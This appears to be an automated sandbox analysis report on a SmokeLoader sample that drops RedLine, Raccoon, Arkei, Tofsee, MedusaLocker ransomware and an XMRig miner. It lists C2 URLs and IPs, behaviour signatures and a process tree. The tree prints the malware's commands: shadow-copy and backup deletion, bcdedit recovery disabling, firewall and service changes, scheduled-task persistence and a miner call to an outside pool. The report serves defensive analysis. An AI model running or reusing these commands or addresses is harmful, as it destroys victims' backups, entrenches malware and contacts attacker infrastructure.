Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-09-2021 14:30

General

  • Target

    272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe

  • Size

    269KB

  • MD5

    bb4a97f08b6da5bff18ae40873fa88fd

  • SHA1

    ca7d5866ff9fedc021251901377583610e8b42f5

  • SHA256

    272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad

  • SHA512

    347ceec8a1d65a6cba2e5c119dff19db7056a230eeb0110260414bb14d06a629e8071f35deb522e9ba15538b44e4ffc570f3b9f568966a164bbf85fe5bdcf920

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://venerynnet1.top/

http://kevonahira2.top/

http://vegangelist3.top/

http://kingriffaele4.top/

http://arakeishant5.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installbv

C2

80.85.137.89:17954

Extracted

Family

redline

Botnet

Moneymaker

C2

185.244.217.166:56316

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • MedusaLocker Payload 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 15 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Deletes System State backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 12 IoCs
  • Executes dropped EXE 22 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 21 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 32 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 42 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 54 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe
    "C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe
      "C:\Users\Admin\AppData\Local\Temp\272f23a4252b4e1229cf23fcf5ec5a329dde3a1a73e459a31cdccc0ee05708ad.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:368
  • C:\Users\Admin\AppData\Local\Temp\E337.exe
    C:\Users\Admin\AppData\Local\Temp\E337.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\epmxxskb\
      2⤵
        PID:3848
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\eqckkvks.exe" C:\Windows\SysWOW64\epmxxskb\
        2⤵
          PID:3920
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create epmxxskb binPath= "C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe /d\"C:\Users\Admin\AppData\Local\Temp\E337.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3168
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description epmxxskb "wifi internet conection"
            2⤵
              PID:3604
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start epmxxskb
              2⤵
                PID:2656
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1000
              • C:\Users\Admin\AppData\Local\Temp\F23B.exe
                C:\Users\Admin\AppData\Local\Temp\F23B.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3252
              • C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe
                C:\Windows\SysWOW64\epmxxskb\eqckkvks.exe /d"C:\Users\Admin\AppData\Local\Temp\E337.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2576
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1244
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1388
              • C:\Users\Admin\AppData\Local\Temp\3A2.exe
                C:\Users\Admin\AppData\Local\Temp\3A2.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3152
              • C:\Users\Admin\AppData\Local\Temp\E80.exe
                C:\Users\Admin\AppData\Local\Temp\E80.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:512
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E80.exe"
                  2⤵
                    PID:276
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4884
                • C:\Users\Admin\AppData\Local\Temp\2351.exe
                  C:\Users\Admin\AppData\Local\Temp\2351.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2984
                • C:\Users\Admin\AppData\Local\Temp\485E.exe
                  C:\Users\Admin\AppData\Local\Temp\485E.exe
                  1⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Modifies extensions of user files
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Enumerates connected drives
                  • Drops file in System32 directory
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2776
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
                    2⤵
                    • Interacts with shadow copies
                    PID:4156
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:4920
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4164
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
                    2⤵
                    • Executes dropped EXE
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4620
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4776
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4176
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4536
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4572
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1672
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4584
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4412
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4992
                  • C:\Windows\SYSTEM32\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:5000
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled No
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3852
                  • C:\Windows\SYSTEM32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1664
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:5044
                  • C:\Windows\SYSTEM32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:4220
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      3⤵
                        PID:5000
                    • C:\Windows\System32\Wbem\wmic.exe
                      wmic.exe SHADOWCOPY /nointeractive
                      2⤵
                        PID:4172
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\485E.exe >> NUL
                        2⤵
                          PID:1200
                      • C:\Users\Admin\AppData\Local\Temp\5233.exe
                        C:\Users\Admin\AppData\Local\Temp\5233.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4216
                        • C:\ProgramData\ZZZZZ.exe
                          "C:\ProgramData\ZZZZZ.exe"
                          2⤵
                            PID:4488
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                              3⤵
                                PID:4536
                                • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                  C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                  4⤵
                                  • Modifies WinLogon for persistence
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in System32 directory
                                  • Drops file in Program Files directory
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4756
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fFW45rqrc4.bat"
                                    5⤵
                                      PID:4180
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        6⤵
                                          PID:4960
                                        • C:\Windows\system32\w32tm.exe
                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                          6⤵
                                            PID:2812
                                          • C:\Windows\System32\PhotoScreensaver\winlogon.exe
                                            "C:\Windows\System32\PhotoScreensaver\winlogon.exe"
                                            6⤵
                                            • Modifies WinLogon for persistence
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Drops file in System32 directory
                                            • Modifies registry class
                                            PID:3852
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eHSya3ThPF.bat"
                                              7⤵
                                                PID:4692
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  8⤵
                                                    PID:3884
                                                  • C:\Windows\system32\w32tm.exe
                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    8⤵
                                                      PID:2804
                                                    • C:\Boot\da-DK\ShellExperienceHost.exe
                                                      "C:\Boot\da-DK\ShellExperienceHost.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:2208
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                            3⤵
                                              PID:4564
                                              • C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                                C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4804
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                                  5⤵
                                                    PID:4768
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                                      6⤵
                                                      • Creates scheduled task(s)
                                                      PID:4984
                                                  • C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4488
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                                      6⤵
                                                        PID:4744
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:1664
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4748
                                              • C:\Users\Admin\AppData\Local\Temp\5233.exe
                                                "C:\Users\Admin\AppData\Local\Temp\5233.exe"
                                                2⤵
                                                  PID:4620
                                                • C:\Users\Admin\AppData\Local\Temp\5233.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\5233.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4632
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4272
                                              • C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4456
                                                • C:\Users\Admin\AppData\Local\Temp\5A71.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\5A71.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:3664
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 1908
                                                  2⤵
                                                  • Program crash
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4668
                                              • C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4812
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /fdsfs
                                                  2⤵
                                                    PID:5056
                                                  • C:\Users\Admin\AppData\Local\Temp\6177.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\6177.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5112
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1228
                                                      3⤵
                                                      • Program crash
                                                      PID:4820
                                                • C:\Users\Admin\AppData\Local\Temp\6E78.exe
                                                  C:\Users\Admin\AppData\Local\Temp\6E78.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:4532
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\winlogon.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4524
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "F23B" /sc ONLOGON /tr "'C:\PerfLogs\F23B.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4148
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "5233" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\tmp6528\5233.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4352
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\wuautoappupdate\winlogon.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4368
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Windows\System32\rtmpal\VSSVC.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4072
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4180
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DeviceElementSource\dllhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4652
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\AppVTerminator\winlogon.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4828
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\dmband\WerFault.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:260
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "6177" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20210408_121853935\6177.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4216
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Boot\da-DK\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4964
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "6E78" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\aria-debug-3324\6E78.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:4592
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:732
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "6177" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent\6177.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:2464
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Creates scheduled task(s)
                                                  PID:2268

                                                Network

                                                MITRE ATT&CK Enterprise v6

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • memory/276-283-0x0000000000000000-mapping.dmp

                                                • memory/368-114-0x0000000000400000-0x0000000000408000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/368-115-0x0000000000402DCE-mapping.dmp

                                                • memory/512-166-0x0000000006580000-0x000000000A65F000-memory.dmp

                                                  Filesize

                                                  64.9MB

                                                • memory/512-167-0x0000000000400000-0x0000000004605000-memory.dmp

                                                  Filesize

                                                  66.0MB

                                                • memory/512-163-0x0000000000000000-mapping.dmp

                                                • memory/908-116-0x0000000000030000-0x0000000000039000-memory.dmp

                                                  Filesize

                                                  36KB

                                                • memory/1000-131-0x0000000000000000-mapping.dmp

                                                • memory/1200-401-0x0000000000000000-mapping.dmp

                                                • memory/1244-138-0x0000000002F40000-0x0000000002F55000-memory.dmp

                                                  Filesize

                                                  84KB

                                                • memory/1244-139-0x0000000002F49A6B-mapping.dmp

                                                • memory/1244-145-0x0000000002F40000-0x0000000002F55000-memory.dmp

                                                  Filesize

                                                  84KB

                                                • memory/1388-177-0x0000000002C9259C-mapping.dmp

                                                • memory/1388-178-0x0000000002C00000-0x0000000002CF1000-memory.dmp

                                                  Filesize

                                                  964KB

                                                • memory/1388-173-0x0000000002C00000-0x0000000002CF1000-memory.dmp

                                                  Filesize

                                                  964KB

                                                • memory/1664-350-0x0000000000000000-mapping.dmp

                                                • memory/1664-330-0x0000000000000000-mapping.dmp

                                                • memory/1672-338-0x0000000000000000-mapping.dmp

                                                • memory/2208-396-0x000000001AD45000-0x000000001AD47000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2208-395-0x000000001AD44000-0x000000001AD45000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2208-394-0x000000001AD42000-0x000000001AD44000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2208-388-0x000000001AD40000-0x000000001AD42000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2208-383-0x0000000000000000-mapping.dmp

                                                • memory/2576-143-0x00000000004A0000-0x00000000004B3000-memory.dmp

                                                  Filesize

                                                  76KB

                                                • memory/2576-144-0x0000000000400000-0x0000000000454000-memory.dmp

                                                  Filesize

                                                  336KB

                                                • memory/2584-123-0x0000000000400000-0x0000000000454000-memory.dmp

                                                  Filesize

                                                  336KB

                                                • memory/2584-122-0x0000000000460000-0x00000000005AA000-memory.dmp

                                                  Filesize

                                                  1.3MB

                                                • memory/2584-118-0x0000000000000000-mapping.dmp

                                                • memory/2644-117-0x0000000000C20000-0x0000000000C35000-memory.dmp

                                                  Filesize

                                                  84KB

                                                • memory/2656-129-0x0000000000000000-mapping.dmp

                                                • memory/2776-197-0x00007FF692710000-0x00007FF692F88000-memory.dmp

                                                  Filesize

                                                  8.5MB

                                                • memory/2776-189-0x0000000000000000-mapping.dmp

                                                • memory/2804-382-0x0000000000000000-mapping.dmp

                                                • memory/2812-362-0x0000000000000000-mapping.dmp

                                                • memory/2984-168-0x0000000000000000-mapping.dmp

                                                • memory/2984-171-0x0000000000850000-0x00000000008E0000-memory.dmp

                                                  Filesize

                                                  576KB

                                                • memory/2984-172-0x0000000000400000-0x0000000000494000-memory.dmp

                                                  Filesize

                                                  592KB

                                                • memory/3152-150-0x0000000000000000-mapping.dmp

                                                • memory/3152-154-0x0000000001170000-0x0000000001171000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3152-161-0x0000000077AB0000-0x0000000077C3E000-memory.dmp

                                                  Filesize

                                                  1.6MB

                                                • memory/3152-162-0x0000000005D00000-0x0000000006306000-memory.dmp

                                                  Filesize

                                                  6.0MB

                                                • memory/3168-126-0x0000000000000000-mapping.dmp

                                                • memory/3252-149-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-146-0x0000000005050000-0x0000000005051000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-181-0x00000000069E0000-0x00000000069E1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-142-0x00000000056F0000-0x00000000056F1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-136-0x0000000000070000-0x0000000000071000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-152-0x0000000005120000-0x0000000005121000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-180-0x0000000007170000-0x0000000007171000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-135-0x0000000077AB0000-0x0000000077C3E000-memory.dmp

                                                  Filesize

                                                  1.6MB

                                                • memory/3252-182-0x0000000006D00000-0x0000000006D01000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3252-128-0x0000000000000000-mapping.dmp

